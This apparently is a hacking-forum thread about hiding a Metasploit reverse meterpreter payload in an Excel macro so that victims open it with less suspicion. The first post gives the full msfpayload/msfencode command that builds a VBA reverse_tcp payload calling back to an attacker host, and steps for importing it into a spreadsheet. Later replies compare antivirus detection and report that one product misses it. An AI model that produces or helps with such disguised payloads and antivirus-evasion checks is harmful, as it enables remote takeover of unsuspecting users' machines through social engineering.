Results 1 to 9 of 9

Thread: Alternate filetype for SE to get reverse meterpreter session

  1. #1
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Lightbulb Alternate filetype for SE to get reverse meterpreter session

    Someone here was looking for non-exe type file (jpg?) so that the victim is less suspicious while running them. Well, an excel file may be the solution.

    I used:
    1. BT3 with msf v3.3
    2. M$ office 2002 SP3 in a vista box

    First, I generated a VBA code in a konsole in BT3 box:
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=7777 R | ./msfencode -b '' -t vba >> /root/Desktop/meterpreter.cls
    I transferred the file to Windows, then, created an excel document, AND Tools>Macro>Visual Basic Editor. From the File>Import File>Browsed to the .cls file.

    Job done!


    PS: Virustotal scans the excel file as clean. Can somebody check with Norton AV please...
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  2. #2
    Junior Member
    Join Date
    Feb 2007
    Posts
    74

    Default

    This is also doable with PDF files, I remember reading an article on securinfos.infos a while back about how to do it.

  3. #3
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    I agree, however the pdf file is caught by around 10 or so number of AV if tested in Virustotal.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  4. #4
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    6

    Default Scanned with Norton AV 2008

    Hey,
    So i created the file and scanned it using Norton AV 2008 running version 15.5.0.23 fully patched.(This is one of the newest versions). No threat was detected :P!! Hope this helps...

  5. #5
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Some good reading in relation to this thread.
    I have since tried it out and well as the study shows it will be picked up.
    hype-free: Detecting the Metasploit encryptors in one hour and 49 lines of Python
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  6. #6
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by L3g10n View Post
    Hey,
    So i created the file and scanned it using Norton AV 2008 running version 15.5.0.23 fully patched.(This is one of the newest versions). No threat was detected :P!! Hope this helps...
    Thanks..


    Quote Originally Posted by archangel.amael View Post
    Some good reading in relation to this thread.
    I have since tried it out and well as the study shows it will be picked up.
    hype-free: Detecting the Metasploit encryptors in one hour and 49 lines of Python
    I like the comment at the end:
    We have to keep those AV guys employed somehow - basic idea is change the loader every few months once their detection catches up. It doesn't have to be good, just different.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  7. #7
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by kazalku View Post
    I like the comment at the end:
    Well it is a "cat and mouse" game after all. Or some would say.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  8. #8
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    6

    Default

    I think their both the cat and the mouse.... :P AV companies that is.... hehe

  9. #9
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by archangel.amael View Post
    Well it is a "cat and mouse" game after all. Or some would say.
    And as usual, "mouse" is ALWAYS the winner, no matter how strong the "cat" is, the little one always find a way to get the "cheese"...
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •